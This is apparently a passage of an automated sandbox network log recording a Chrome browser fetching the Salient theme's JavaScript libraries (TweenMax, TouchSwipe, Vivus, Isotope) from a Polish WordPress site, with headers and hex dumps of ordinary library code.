                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: script
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:03 UTC288INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:03 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:55:04 GMT
                                                            ETag: "1ad39-620a8e97d84e6"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 109881
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:08:03 UTC7904INData Raw: 2f 2a 21 0a 20 2a 20 56 45 52 53 49 4f 4e 3a 20 31 2e 31 38 2e 30 0a 20 2a 20 44 41 54 45 3a 20 32 30 31 35 2d 30 39 2d 30 35 0a 20 2a 20 55 50 44 41 54 45 53 20 41 4e 44 20 44 4f 43 53 20 41 54 3a 20 68 74 74 70 3a 2f 2f 67 72 65 65 6e 73 6f 63 6b 2e 63 6f 6d 0a 20 2a 20 0a 20 2a 20 49 6e 63 6c 75 64 65 73 20 61 6c 6c 20 6f 66 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 3a 20 54 77 65 65 6e 4c 69 74 65 2c 20 54 77 65 65 6e 4d 61 78 2c 20 54 69 6d 65 6c 69 6e 65 4c 69 74 65 2c 20 54 69 6d 65 6c 69 6e 65 4d 61 78 2c 20 45 61 73 65 50 61 63 6b 2c 20 43 53 53 50 6c 75 67 69 6e 2c 20 52 6f 75 6e 64 50 72 6f 70 73 50 6c 75 67 69 6e 2c 20 42 65 7a 69 65 72 50 6c 75 67 69 6e 2c 20 41 74 74 72 50 6c 75 67 69 6e 2c 20 44 69 72 65 63 74 69 6f 6e 61 6c 52 6f 74 61 74
                                                            Data Ascii: /*! * VERSION: 1.18.0 * DATE: 2015-09-05 * UPDATES AND DOCS AT: http://greensock.com * * Includes all of the following: TweenLite, TweenMax, TimelineLite, TimelineMax, EasePack, CSSPlugin, RoundPropsPlugin, BezierPlugin, AttrPlugin, DirectionalRotat
                                                            2025-01-15 10:08:03 UTC8000INData Raw: 6e 2c 61 2c 6f 3d 66 28 72 29 2c 6c 3d 69 26 26 73 26 26 72 2c 68 3d 6f 2e 6c 65 6e 67 74 68 3b 2d 2d 68 3e 2d 31 3b 29 61 3d 6f 5b 68 5d 2c 28 6c 7c 7c 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 65 7c 7c 28 6e 3d 61 2e 74 61 72 67 65 74 3d 3d 3d 61 2e 76 61 72 73 2e 6f 6e 43 6f 6d 70 6c 65 74 65 29 26 26 73 7c 7c 69 26 26 21 6e 29 26 26 61 2e 70 61 75 73 65 64 28 74 29 7d 3b 72 65 74 75 72 6e 20 6e 2e 70 61 75 73 65 41 6c 6c 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 69 29 7b 70 28 21 30 2c 74 2c 65 2c 69 29 7d 2c 6e 2e 72 65 73 75 6d 65 41 6c 6c 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 69 29 7b 70 28 21 31 2c 74 2c 65 2c 69 29 7d 2c 6e 2e 67 6c 6f 62 61 6c 54 69 6d 65 53 63 61 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 73 3d 74 2e 5f 72 6f 6f
                                                            Data Ascii: n,a,o=f(r),l=i&&s&&r,h=o.length;--h>-1;)a=o[h],(l||a instanceof e||(n=a.target===a.vars.onComplete)&&s||i&&!n)&&a.paused(t)};return n.pauseAll=function(t,e,i){p(!0,t,e,i)},n.resumeAll=function(t,e,i){p(!1,t,e,i)},n.globalTimeScale=function(e){var s=t._roo
                                                            2025-01-15 10:08:03 UTC8000INData Raw: 69 6d 65 3d 3d 3d 72 29 26 26 74 68 69 73 2e 5f 72 61 77 50 72 65 76 54 69 6d 65 21 3d 3d 74 26 26 74 68 69 73 2e 5f 66 69 72 73 74 26 26 28 6c 3d 21 30 2c 74 68 69 73 2e 5f 72 61 77 50 72 65 76 54 69 6d 65 3e 72 26 26 28 6f 3d 22 6f 6e 52 65 76 65 72 73 65 43 6f 6d 70 6c 65 74 65 22 29 29 29 2c 74 68 69 73 2e 5f 72 61 77 50 72 65 76 54 69 6d 65 3d 74 68 69 73 2e 5f 64 75 72 61 74 69 6f 6e 7c 7c 21 65 7c 7c 74 7c 7c 74 68 69 73 2e 5f 72 61 77 50 72 65 76 54 69 6d 65 3d 3d 3d 74 3f 74 3a 72 2c 74 3d 63 2b 31 65 2d 34 3b 65 6c 73 65 20 69 66 28 31 65 2d 37 3e 74 29 69 66 28 74 68 69 73 2e 5f 74 6f 74 61 6c 54 69 6d 65 3d 74 68 69 73 2e 5f 74 69 6d 65 3d 30 2c 28 30 21 3d 3d 66 7c 7c 30 3d 3d 3d 74 68 69 73 2e 5f 64 75 72 61 74 69 6f 6e 26 26 74 68 69 73 2e
                                                            Data Ascii: ime===r)&&this._rawPrevTime!==t&&this._first&&(l=!0,this._rawPrevTime>r&&(o="onReverseComplete"))),this._rawPrevTime=this._duration||!e||t||this._rawPrevTime===t?t:r,t=c+1e-4;else if(1e-7>t)if(this._totalTime=this._time=0,(0!==f||0===this._duration&&this.
                                                            2025-01-15 10:08:03 UTC8000INData Raw: 7c 7c 74 68 69 73 2e 5f 72 61 77 50 72 65 76 54 69 6d 65 3d 3d 3d 74 3f 74 3a 72 2c 30 3d 3d 3d 74 26 26 6e 29 66 6f 72 28 73 3d 74 68 69 73 2e 5f 66 69 72 73 74 3b 73 26 26 30 3d 3d 3d 73 2e 5f 73 74 61 72 74 54 69 6d 65 3b 29 73 2e 5f 64 75 72 61 74 69 6f 6e 7c 7c 28 6e 3d 21 31 29 2c 73 3d 73 2e 5f 6e 65 78 74 3b 74 3d 30 2c 74 68 69 73 2e 5f 69 6e 69 74 74 65 64 7c 7c 28 5f 3d 21 30 29 7d 65 6c 73 65 20 69 66 28 30 3d 3d 3d 70 26 26 30 3e 79 26 26 28 5f 3d 21 30 29 2c 74 68 69 73 2e 5f 74 69 6d 65 3d 74 68 69 73 2e 5f 72 61 77 50 72 65 76 54 69 6d 65 3d 74 2c 74 68 69 73 2e 5f 6c 6f 63 6b 65 64 7c 7c 28 74 68 69 73 2e 5f 74 6f 74 61 6c 54 69 6d 65 3d 74 2c 30 21 3d 3d 74 68 69 73 2e 5f 72 65 70 65 61 74 26 26 28 75 3d 70 2b 74 68 69 73 2e 5f 72 65 70
                                                            Data Ascii: ||this._rawPrevTime===t?t:r,0===t&&n)for(s=this._first;s&&0===s._startTime;)s._duration||(n=!1),s=s._next;t=0,this._initted||(_=!0)}else if(0===p&&0>y&&(_=!0),this._time=this._rawPrevTime=t,this._locked||(this._totalTime=t,0!==this._repeat&&(u=p+this._rep
                                                            2025-01-15 10:08:03 UTC8000INData Raw: 73 7d 2c 70 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 65 3d 65 3e 3e 30 7c 7c 36 3b 76 61 72 20 69 2c 73 2c 72 2c 6e 2c 61 3d 5b 5d 2c 6f 3d 5b 5d 2c 6c 3d 30 2c 68 3d 30 2c 5f 3d 65 2d 31 2c 75 3d 5b 5d 2c 63 3d 5b 5d 3b 66 6f 72 28 69 20 69 6e 20 74 29 66 28 74 5b 69 5d 2c 61 2c 65 29 3b 66 6f 72 28 72 3d 61 2e 6c 65 6e 67 74 68 2c 73 3d 30 3b 72 3e 73 3b 73 2b 2b 29 6c 2b 3d 4d 61 74 68 2e 73 71 72 74 28 61 5b 73 5d 29 2c 6e 3d 73 25 65 2c 63 5b 6e 5d 3d 6c 2c 6e 3d 3d 3d 5f 26 26 28 68 2b 3d 6c 2c 6e 3d 73 2f 65 3e 3e 30 2c 75 5b 6e 5d 3d 63 2c 6f 5b 6e 5d 3d 68 2c 6c 3d 30 2c 63 3d 5b 5d 29 3b 72 65 74 75 72 6e 7b 6c 65 6e 67 74 68 3a 68 2c 6c 65 6e 67 74 68 73 3a 6f 2c 73 65 67 6d 65 6e 74 73 3a 75 7d 7d 2c 6d 3d 5f 67 73 53 63 6f 70 65 2e 5f 67
                                                            Data Ascii: s},p=function(t,e){e=e>>0||6;var i,s,r,n,a=[],o=[],l=0,h=0,_=e-1,u=[],c=[];for(i in t)f(t[i],a,e);for(r=a.length,s=0;r>s;s++)l+=Math.sqrt(a[s]),n=s%e,c[n]=l,n===_&&(h+=l,n=s/e>>0,u[n]=c,o[n]=h,l=0,c=[]);return{length:h,lengths:o,segments:u}},m=_gsScope._g
                                                            2025-01-15 10:08:03 UTC8000INData Raw: 74 22 3d 3d 3d 65 3f 22 4c 65 66 74 22 3a 22 54 6f 70 22 2c 72 3d 51 28 74 2c 22 6d 61 72 67 69 6e 22 2b 73 2c 69 29 3b 72 65 74 75 72 6e 20 74 5b 22 6f 66 66 73 65 74 22 2b 73 5d 2d 28 24 28 74 2c 65 2c 70 61 72 73 65 46 6c 6f 61 74 28 72 29 2c 72 2e 72 65 70 6c 61 63 65 28 54 2c 22 22 29 29 7c 7c 30 29 7d 2c 4b 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 69 2c 73 2c 72 2c 6e 3d 7b 7d 3b 69 66 28 65 3d 65 7c 7c 5a 28 74 2c 6e 75 6c 6c 29 29 69 66 28 69 3d 65 2e 6c 65 6e 67 74 68 29 66 6f 72 28 3b 2d 2d 69 3e 2d 31 3b 29 72 3d 65 5b 69 5d 2c 28 2d 31 3d 3d 3d 72 2e 69 6e 64 65 78 4f 66 28 22 2d 74 72 61 6e 73 66 6f 72 6d 22 29 7c 7c 6b 65 3d 3d 3d 72 29 26 26 28 6e 5b 72 2e 72 65 70 6c 61 63 65 28 53 2c 4f 29 5d 3d 65 2e 67 65 74 50 72 6f 70
                                                            Data Ascii: t"===e?"Left":"Top",r=Q(t,"margin"+s,i);return t["offset"+s]-($(t,e,parseFloat(r),r.replace(T,""))||0)},K=function(t,e){var i,s,r,n={};if(e=e||Z(t,null))if(i=e.length)for(;--i>-1;)r=e[i],(-1===r.indexOf("-transform")||ke===r)&&(n[r.replace(S,O)]=e.getProp
                                                            2025-01-15 10:08:03 UTC8000INData Raw: 73 70 61 72 65 6e 74 22 2c 61 2e 65 3d 61 2e 65 2e 73 70 6c 69 74 28 52 5b 75 5d 29 2e 6a 6f 69 6e 28 22 74 72 61 6e 73 70 61 72 65 6e 74 22 29 29 3a 28 59 7c 7c 28 78 3d 21 31 29 2c 6b 3f 61 2e 61 70 70 65 6e 64 58 74 72 61 28 78 3f 22 68 73 6c 61 28 22 3a 22 68 73 6c 28 22 2c 70 5b 30 5d 2c 72 65 28 6d 5b 30 5d 2c 70 5b 30 5d 29 2c 22 2c 22 2c 21 31 2c 21 30 29 2e 61 70 70 65 6e 64 58 74 72 61 28 22 22 2c 70 5b 31 5d 2c 72 65 28 6d 5b 31 5d 2c 70 5b 31 5d 29 2c 22 25 2c 22 2c 21 31 29 2e 61 70 70 65 6e 64 58 74 72 61 28 22 22 2c 70 5b 32 5d 2c 72 65 28 6d 5b 32 5d 2c 70 5b 32 5d 29 2c 78 3f 22 25 2c 22 3a 22 25 22 2b 50 2c 21 31 29 3a 61 2e 61 70 70 65 6e 64 58 74 72 61 28 78 3f 22 72 67 62 61 28 22 3a 22 72 67 62 28 22 2c 70 5b 30 5d 2c 6d 5b 30 5d 2d
                                                            Data Ascii: sparent",a.e=a.e.split(R[u]).join("transparent")):(Y||(x=!1),k?a.appendXtra(x?"hsla(":"hsl(",p[0],re(m[0],p[0]),",",!1,!0).appendXtra("",p[1],re(m[1],p[1]),"%,",!1).appendXtra("",p[2],re(m[2],p[2]),x?"%,":"%"+P,!1):a.appendXtra(x?"rgba(":"rgb(",p[0],m[0]-
                                                            2025-01-15 10:08:03 UTC8000INData Raw: 2c 5f 3d 28 30 7c 4d 61 74 68 2e 63 6f 73 28 6e 29 2a 73 2e 73 63 61 6c 65 59 2a 61 29 2f 61 2c 75 3d 74 68 69 73 2e 74 2e 73 74 79 6c 65 2c 63 3d 74 68 69 73 2e 74 2e 63 75 72 72 65 6e 74 53 74 79 6c 65 3b 69 66 28 63 29 7b 69 3d 6c 2c 6c 3d 2d 68 2c 68 3d 2d 69 2c 65 3d 63 2e 66 69 6c 74 65 72 2c 75 2e 66 69 6c 74 65 72 3d 22 22 3b 76 61 72 20 66 2c 70 2c 64 3d 74 68 69 73 2e 74 2e 6f 66 66 73 65 74 57 69 64 74 68 2c 67 3d 74 68 69 73 2e 74 2e 6f 66 66 73 65 74 48 65 69 67 68 74 2c 76 3d 22 61 62 73 6f 6c 75 74 65 22 21 3d 3d 63 2e 70 6f 73 69 74 69 6f 6e 2c 79 3d 22 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 4d 61 74 72 69 78 28 4d 31 31 3d 22 2b 6f 2b 22 2c 20 4d 31 32 3d 22 2b 6c 2b 22 2c 20
                                                            Data Ascii: ,_=(0|Math.cos(n)*s.scaleY*a)/a,u=this.t.style,c=this.t.currentStyle;if(c){i=l,l=-h,h=-i,e=c.filter,u.filter="";var f,p,d=this.t.offsetWidth,g=this.t.offsetHeight,v="absolute"!==c.position,y="progid:DXImageTransform.Microsoft.Matrix(M11="+o+", M12="+l+",
                                                            2025-01-15 10:08:03 UTC8000INData Raw: 63 2e 73 75 62 73 74 72 28 28 70 2b 22 22 29 2e 6c 65 6e 67 74 68 2d 28 30 3e 70 3f 31 3a 30 29 29 7c 7c 22 22 29 3a 28 70 3d 70 61 72 73 65 46 6c 6f 61 74 28 63 29 2c 67 3d 63 2e 73 75 62 73 74 72 28 28 70 2b 22 22 29 2e 6c 65 6e 67 74 68 29 29 2c 22 22 3d 3d 3d 67 26 26 28 67 3d 73 5b 69 5d 7c 7c 76 29 2c 67 21 3d 3d 76 26 26 28 54 3d 24 28 74 2c 22 62 6f 72 64 65 72 4c 65 66 74 22 2c 66 2c 76 29 2c 78 3d 24 28 74 2c 22 62 6f 72 64 65 72 54 6f 70 22 2c 66 2c 76 29 2c 22 25 22 3d 3d 3d 67 3f 28 75 3d 31 30 30 2a 28 54 2f 6d 29 2b 22 25 22 2c 5f 3d 31 30 30 2a 28 78 2f 64 29 2b 22 25 22 29 3a 22 65 6d 22 3d 3d 3d 67 3f 28 77 3d 24 28 74 2c 22 62 6f 72 64 65 72 4c 65 66 74 22 2c 31 2c 22 65 6d 22 29 2c 75 3d 54 2f 77 2b 22 65 6d 22 2c 5f 3d 78 2f 77 2b 22
                                                            Data Ascii: c.substr((p+"").length-(0>p?1:0))||""):(p=parseFloat(c),g=c.substr((p+"").length)),""===g&&(g=s[i]||v),g!==v&&(T=$(t,"borderLeft",f,v),x=$(t,"borderTop",f,v),"%"===g?(u=100*(T/m)+"%",_=100*(x/d)+"%"):"em"===g?(w=$(t,"borderLeft",1,"em"),u=T/w+"em",_=x/w+"
                                                            2025-01-15 10:08:03 UTC8000INData Raw: 6e 75 6c 6c 2c 69 2c 30 2c 6e 29 29 2c 6e 26 26 69 26 26 21 69 2e 70 6c 75 67 69 6e 26 26 28 69 2e 70 6c 75 67 69 6e 3d 6e 29 3b 72 65 74 75 72 6e 20 69 7d 2c 68 2e 73 65 74 52 61 74 69 6f 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 69 2c 73 2c 72 3d 74 68 69 73 2e 5f 66 69 72 73 74 50 54 2c 6e 3d 31 65 2d 36 3b 69 66 28 31 21 3d 3d 74 7c 7c 74 68 69 73 2e 5f 74 77 65 65 6e 2e 5f 74 69 6d 65 21 3d 3d 74 68 69 73 2e 5f 74 77 65 65 6e 2e 5f 64 75 72 61 74 69 6f 6e 26 26 30 21 3d 3d 74 68 69 73 2e 5f 74 77 65 65 6e 2e 5f 74 69 6d 65 29 69 66 28 74 7c 7c 74 68 69 73 2e 5f 74 77 65 65 6e 2e 5f 74 69 6d 65 21 3d 3d 74 68 69 73 2e 5f 74 77 65 65 6e 2e 5f 64 75 72 61 74 69 6f 6e 26 26 30 21 3d 3d 74 68 69 73 2e 5f 74 77 65 65 6e 2e 5f 74 69 6d 65 7c
                                                            Data Ascii: null,i,0,n)),n&&i&&!i.plugin&&(i.plugin=n);return i},h.setRatio=function(t){var e,i,s,r=this._firstPT,n=1e-6;if(1!==t||this._tween._time!==this._tween._duration&&0!==this._tween._time)if(t||this._tween._time!==this._tween._duration&&0!==this._tween._time|


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            76192.168.2.1649793178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:03 UTC419OUTGET /wp-content/themes/salient/js/touchswipe.min.js?ver=1.0 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:03 UTC286INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:03 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:55:02 GMT
                                                            ETag: "2c1f-620a8e95cfcf2"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 11295
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:08:03 UTC7906INData Raw: 2f 2a 20 54 6f 75 63 68 20 73 77 69 70 65 20 2a 2f 0a 28 66 75 6e 63 74 69 6f 6e 28 64 29 7b 76 61 72 20 6d 3d 22 6c 65 66 74 22 2c 6c 3d 22 72 69 67 68 74 22 2c 63 3d 22 75 70 22 2c 73 3d 22 64 6f 77 6e 22 2c 62 3d 22 69 6e 22 2c 74 3d 22 6f 75 74 22 2c 6a 3d 22 6e 6f 6e 65 22 2c 6f 3d 22 61 75 74 6f 22 2c 69 3d 22 73 77 69 70 65 22 2c 70 3d 22 70 69 6e 63 68 22 2c 75 3d 22 74 61 70 22 2c 78 3d 22 68 6f 72 69 7a 6f 6e 74 61 6c 22 2c 71 3d 22 76 65 72 74 69 63 61 6c 22 2c 67 3d 22 61 6c 6c 22 2c 65 3d 22 73 74 61 72 74 22 2c 68 3d 22 6d 6f 76 65 22 2c 66 3d 22 65 6e 64 22 2c 6e 3d 22 63 61 6e 63 65 6c 22 2c 61 3d 22 6f 6e 74 6f 75 63 68 73 74 61 72 74 22 20 69 6e 20 77 69 6e 64 6f 77 2c 76 3d 22 54 6f 75 63 68 53 77 69 70 65 22 3b 76 61 72 20 6b 3d 7b 66
                                                            Data Ascii: /* Touch swipe */(function(d){var m="left",l="right",c="up",s="down",b="in",t="out",j="none",o="auto",i="swipe",p="pinch",u="tap",x="horizontal",q="vertical",g="all",e="start",h="move",f="end",n="cancel",a="ontouchstart" in window,v="TouchSwipe";var k={f
                                                            2025-01-15 10:08:03 UTC3389INData Raw: 64 2e 78 3d 61 51 2e 70 61 67 65 58 7c 7c 61 51 2e 63 6c 69 65 6e 74 58 3b 61 52 2e 65 6e 64 2e 79 3d 61 51 2e 70 61 67 65 59 7c 7c 61 51 2e 63 6c 69 65 6e 74 59 3b 72 65 74 75 72 6e 20 61 52 7d 66 75 6e 63 74 69 6f 6e 20 4a 28 61 52 29 7b 66 6f 72 28 76 61 72 20 61 51 3d 30 3b 61 51 3c 61 69 2e 6c 65 6e 67 74 68 3b 61 51 2b 2b 29 7b 69 66 28 61 69 5b 61 51 5d 2e 69 64 65 6e 74 69 66 69 65 72 3d 3d 61 52 29 7b 72 65 74 75 72 6e 20 61 69 5b 61 51 5d 7d 7d 7d 66 75 6e 63 74 69 6f 6e 20 54 28 29 7b 76 61 72 20 61 51 3d 5b 5d 3b 66 6f 72 28 76 61 72 20 61 52 3d 30 3b 61 52 3c 3d 35 3b 61 52 2b 2b 29 7b 61 51 2e 70 75 73 68 28 7b 73 74 61 72 74 3a 7b 78 3a 30 2c 79 3a 30 7d 2c 65 6e 64 3a 7b 78 3a 30 2c 79 3a 30 7d 2c 69 64 65 6e 74 69 66 69 65 72 3a 30 7d 29
                                                            Data Ascii: d.x=aQ.pageX||aQ.clientX;aR.end.y=aQ.pageY||aQ.clientY;return aR}function J(aR){for(var aQ=0;aQ<ai.length;aQ++){if(ai[aQ].identifier==aR){return ai[aQ]}}}function T(){var aQ=[];for(var aR=0;aR<=5;aR++){aQ.push({start:{x:0,y:0},end:{x:0,y:0},identifier:0})


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            77192.168.2.1649794178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:03 UTC596OUTGET /wp-content/themes/salient/js/vivus.min.js?ver=6.0.1 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: script
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:03 UTC286INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:03 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:55:02 GMT
                                                            ETag: "2e8e-620a8e961b00b"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 11918
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:08:03 UTC7906INData Raw: 2f 2a 2a 0a 20 2a 20 76 69 76 75 73 20 2d 20 4a 61 76 61 53 63 72 69 70 74 20 6c 69 62 72 61 72 79 20 74 6f 20 6d 61 6b 65 20 64 72 61 77 69 6e 67 20 61 6e 69 6d 61 74 69 6f 6e 20 6f 6e 20 53 56 47 0a 20 2a 20 40 76 65 72 73 69 6f 6e 20 76 30 2e 32 2e 31 0a 20 2a 20 40 6c 69 6e 6b 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 6d 61 78 77 65 6c 6c 69 74 6f 2f 76 69 76 75 73 0a 20 2a 20 40 6c 69 63 65 6e 73 65 20 4d 49 54 0a 20 2a 2f 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 75 6e 63 74 69 6f 6e 20 72 28 72 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 72 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 27 50 61 74 68 66 6f 72 6d 65 72 20 5b 63 6f 6e 73 74 72 75 63
                                                            Data Ascii: /** * vivus - JavaScript library to make drawing animation on SVG * @version v0.2.1 * @link https://github.com/maxwellito/vivus * @license MIT */"use strict";!function(t,e){function r(r){if("undefined"==typeof r)throw new Error('Pathformer [construc
                                                            2025-01-15 10:08:03 UTC4012INData Raw: 65 61 6b 3b 63 61 73 65 22 69 6e 56 69 65 77 70 6f 72 74 22 3a 76 61 72 20 65 3d 74 68 69 73 2c 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 65 2e 69 73 49 6e 56 69 65 77 70 6f 72 74 28 65 2e 65 6c 2c 31 29 26 26 28 65 2e 70 6c 61 79 28 29 2c 74 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 73 63 72 6f 6c 6c 22 2c 72 29 29 7d 3b 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 73 63 72 6f 6c 6c 22 2c 72 29 2c 72 28 29 7d 7d 2c 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 53 74 61 74 75 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 30 3d 3d 3d 74 68 69 73 2e 63 75 72 72 65 6e 74 46 72 61 6d 65 3f 22 73 74 61 72 74 22 3a 74 68 69 73 2e 63 75 72 72 65 6e 74 46 72 61 6d 65 3d 3d 3d 74 68 69 73 2e 66 72 61 6d 65 4c 65 6e
                                                            Data Ascii: eak;case"inViewport":var e=this,r=function(){e.isInViewport(e.el,1)&&(e.play(),t.removeEventListener("scroll",r))};t.addEventListener("scroll",r),r()}},n.prototype.getStatus=function(){return 0===this.currentFrame?"start":this.currentFrame===this.frameLen


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            78192.168.2.1649795178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:03 UTC416OUTGET /wp-content/themes/salient/js/isotope.min.js?ver=7.6 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:03 UTC286INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:03 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:55:04 GMT
                                                            ETag: "d616-620a8e980e041"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 54806
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:08:03 UTC7906INData Raw: 2f 2a 21 0a 20 2a 20 49 73 6f 74 6f 70 65 20 50 41 43 4b 41 47 45 44 20 76 32 2e 32 2e 32 0a 20 2a 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 47 50 4c 76 33 20 66 6f 72 20 6f 70 65 6e 20 73 6f 75 72 63 65 20 75 73 65 0a 20 2a 20 6f 72 20 49 73 6f 74 6f 70 65 20 43 6f 6d 6d 65 72 63 69 61 6c 20 4c 69 63 65 6e 73 65 20 66 6f 72 20 63 6f 6d 6d 65 72 63 69 61 6c 20 75 73 65 0a 20 2a 0a 20 2a 20 68 74 74 70 3a 2f 2f 69 73 6f 74 6f 70 65 2e 6d 65 74 61 66 69 7a 7a 79 2e 63 6f 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 35 20 4d 65 74 61 66 69 7a 7a 79 0a 20 2a 2f 0a 0a 21 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 63 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 62 29 7b 62 2e 70 72 6f 74 6f 74 79
                                                            Data Ascii: /*! * Isotope PACKAGED v2.2.2 * * Licensed GPLv3 for open source use * or Isotope Commercial License for commercial use * * http://isotope.metafizzy.co * Copyright 2015 Metafizzy */!function(a){function b(){}function c(a){function c(b){b.prototy
